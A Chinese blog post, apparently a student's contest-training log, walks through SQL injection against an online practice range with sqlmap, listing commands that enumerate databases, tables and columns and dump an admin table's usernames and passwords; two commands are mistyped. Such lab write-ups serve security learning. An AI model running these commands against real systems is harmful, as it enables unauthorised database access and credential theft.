信息安全铁人三项学习第三天

最新推荐文章于 2023-01-12 09:47:39 发布
最新推荐文章于 2023-01-12 09:47:39 发布
阅读量432 收藏 5
点赞数 1
分类专栏: 信息安全铁人三项赛 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45722065/article/details/105729852
版权

今天我学习sql注入

掌控安全的封神台是一个很好的在线联系的一个靶场地址
在这里插入图片描述
这是其中一个基础的sql注入练习靶场,题目以及告诉我们是使用sql注入了,那么我先使用的sqlmap来进行注入,比较简单,只要记住命令就可以了
首先

sqlmap -u http://59.63.200.79:8003/?id=1

判断是否有注入点,结果很明显,存在注入点
第二部就是查库

sqlmap -u http://59.63.200.79:8003/?id=1 --dbs --batch

dbs 就是库查询,batch就是自动默认选项
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
不需要太长时间就可以暴库完成,那么这里有几个库,我们关注第二个‘maoshe’
接下来就看看库里面有什么表

sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe --tables --batch

在这里插入图片描述
在这里插入图片描述
这个表里面出现了一个我们非常熟悉的东西‘admin’感觉就要成功了,我们进去看看是不是我们需要的

sqlmap -u sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns --batch

在这里插入图片描述
在这里插入图片描述
嗯,有点东西,我们好像找到了我们需要的东西,但是并没有明文密码。接下来就要猜解表了

sqlmap -u sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump

在这里插入图片描述
在这里插入图片描述
这里我们成功获取到了明文密码。

韦小斧WLA
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018年信息安全铁人三项赛数据赛题题目(数据包分析)
04-30
信息安全铁人三项赛应运而生,这是一项面向全国大学生的公益性科技类竞赛,旨在通过整合信息安全产业资源、对接高校,为大学生提供一个进行信息安全技术创新、深入产业行业应用以及扩展安全视野的平台。资源为分区...
信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解
weixin_39535125的博客
12-19 343
本文原创作者:一叶飘零目录题目描述第一个数据包第三个数据包第四个数据包路由器hacking后记题目描述1.黑客的IP是多少2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)3.服务器拿到的webshell的网址(请输入url解码后的网址)4.服务器1.99的主机名5.网站根目录的绝对路径(注意最后加斜杠)6.黑客上传的第一个文件名称是什么7.黑客进行内网扫描,扫描的端口都有哪些(...
信息安全铁人三项赛真题解析_2020信息安全铁人三项赛第一赛区个人赛题解
weixin_35034536的博客
01-13 1183
感谢各位师傅手下留情,感谢出题人不杀之恩说一下,个人赛题目不难,都是UAF还有格式化字符串,很快打完,和各位师傅并列第一,然后就去企业渗透了,所以细节我这里就不啰嗦了,简单说一下思路然后直接贴exp。个人赛heap功能很全,add、delete、show、edit。主要漏洞点在delete中,UAF。因此直接unsorted bin leak libc再进行一次UAF fastbin attack...
sqlmap的使用方法(含靶场)
0nc3的博客
11-06 7692
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2340
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
信息安全铁人三项
weixin_45722065的博客
04-22 2253
信息安全铁人三项学习第一天 信息安全数据分析对抗赛(数据分析赛) 一.系统日志分析 1.理解 window 系统日志与分析方法 2.理解 windows 安全日志与分析方法 3.理解 windows 应用程序日志与分析方法 4.理解 linux 系统日志与分析方法 1.理解window安全日志与分析方法 对于我们经常使用的操作系统来说,系统日志与分析方法是比较陌生的,我打算先百度看一看怎么查看系...
铁人三项电路原理图和PCB
05-11
"文档资料 铁人三项电路原理图和PCB"中的"SHEJI.ddb"可能是设计数据库文件,它可能包含了上述所有详细信息,包括元件的规格、电路布局、布线路径等。这样的文件对于理解电路的工作原理、进行修改或复制设计至关重要...
protel99se原创电路图PCB图 铁人三项 20181128
11-28
4. **仿真验证**:“铁人三项”的第三个阶段可能是电路的仿真,检查电路的性能和稳定性。Protel 99 SE内置了SPICE(Simulation Program with Integrated Circuit Emphasis)仿真器,可以对电路进行直流、交流、瞬态...
铁人三项(算法分析与设计)
01-04
铁人三项包括的三项为: 第一项 从1000个高矮不一的人选出10有两个选项:第一,可以选高度差距值最接近的;第二,可以选最高的。 第二项 每个人从与自己...第三项 把十个数值分成3部分,使得三个部分之间的差值最少。
Triathlon:我的铁人三项数据分析
04-08
在“Triathlon:我的铁人三项数据分析”这个项目中,我们将深入探讨铁人三项运动的各个方面,通过数据来揭示运动员的表现、训练效果以及比赛策略。铁人三项是一项结合了游泳、自行车骑行和跑步的耐力运动,对于参赛者...
信息安全铁人三项赛真题解析_2018信息安全铁人三项赛 资格测评WP
weixin_39704246的博客
12-30 594
2018信息安全铁人三项赛 资格测评1.权限【题目描述】:你是管理员吗?【解题链接】:http://ctf4.shiyanbar.com/web/root/index.php1.进入后会发现hint,标题为password.txt。访问,获取密码字典。2.爆破密码后,在cookie中发现一个网址,访问,进入小黑留言板。3.看到提示,说是让用小黑的账号发留言。尝试发留言,会得到未登录,然后分析数据包...
信息安全铁人三项学习第二天
weixin_45722065的博客
04-23 348
iis 日志分析方法IIS是什么呢?查看IIS日志分析日志 IIS是什么呢? iis是IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。 查看IIS日志 首先呢,我使用的是server2012,所以这里使用server2012作...
信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解
weixin_39533432的博客
12-19 1034
前言由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录题目分享:链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4题目描述1.黑客攻击的第一个受害主机的网卡IP地址2.黑客对URL的哪一个参数实施了SQL注入3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_...
信息安全 数据赛 铁人三项_信息安全铁人三项赛线上资格赛完美收官
weixin_39623082的博客
12-19 423
​​4月8日,由中国信息安全测评中心指导,中国信息产业商会信息安全产业分会主办、教育部高等学校信息安全专业教学指导委员会协办,中国信息安全产业商会信息安全产业分会人才建设专业委员会和北京西普阳光教育科技股份有限公司总承办的以典型实际应用环境为背景的实战技能大赛——“信息安全铁人三项赛”之线上资格赛在西普教育U-SaaS技能竞赛平台开战。​ 上午9点开赛,来自华中赛区和第⑧赛区的近300支高校战队...
信息安全铁人三项比赛答案
vspiders的博客
05-24 8990
一、    问题背景 黑客对一个网站管理系统进行了暴力破解,成功获取了管理权限,并下载了重要文件。 二、    问题分析 1,       黑客最终获得了什么用户名 根据问题背景,黑客对一个网站管理系统进行了暴力破解。那么预测是对网站进行密码的穷举破解,既通过不断地向网站发送POST登陆请求,不断尝试字典里的账号密码登陆直到找到正确的网站管理系统账号密码。因此在wireshark中使用过滤
信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...
weixin_39697143的博客
12-19 1503
赛事章程竞赛总则为贯彻《国务院关于大力推进大众创业万众创新若干政策措施的意见》《国务院办公厅关于深化高等学校创新创业教育改革的实施意见》,落实中央网信办、国家发改委、教育部等六部门《关于加强网络空间安全学科建设和人才培养的意见》、《教育部关于加强教育行业网络与信息安全工作的指导意见》。依托全国高校校企合作“双创”实战演练平台,为加强网络安全相关学科建设、人才培养和技术创新,中国信息安全测评中心联同...
第三届信息安全铁人三项第二赛区部分wp
qq_44060093的博客
11-14 1010
为啥是部分wp呢。。。还不是因为太菜了。。。 企业环境渗透 进去看到主页 搜索一下信息,发现有一个用户信息的文件 下载下来,几行没用的信息,随便点了几下,发现flag4 主页有一个文件上传的点,先不考虑,一般主页安全都做得比较好,最后再看 然后御剑扫一下 发现一个test目录,访问 又一个文件上传,这个测试安全防护可能比较差,写个一句话上传 上传点没有任何防护,上传成功 蚁剑连接 在根目录发现flag5 剩下的因水平问题没有做出来,当时比赛事用nmap扫描端口发现开放了ssh,3389远程桌面
SQLMap学习笔记(一)
Lorezon的博客
11-18 382
一:SQLMap简介 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MYSQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB。 SQLmap采用了布尔盲注、时间盲注、...
铁人三项赛事编排算法
最新发布
03-23
铁人三项赛事编排算法是为了合理安排参赛选手在游泳、自行车和跑步三个项目中的比赛顺序和时间,以确保比赛的公平性和顺利进行。以下是一种常见的铁人三项赛事编排算法: 1. 随机分组:首先,将所有参赛选手随机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值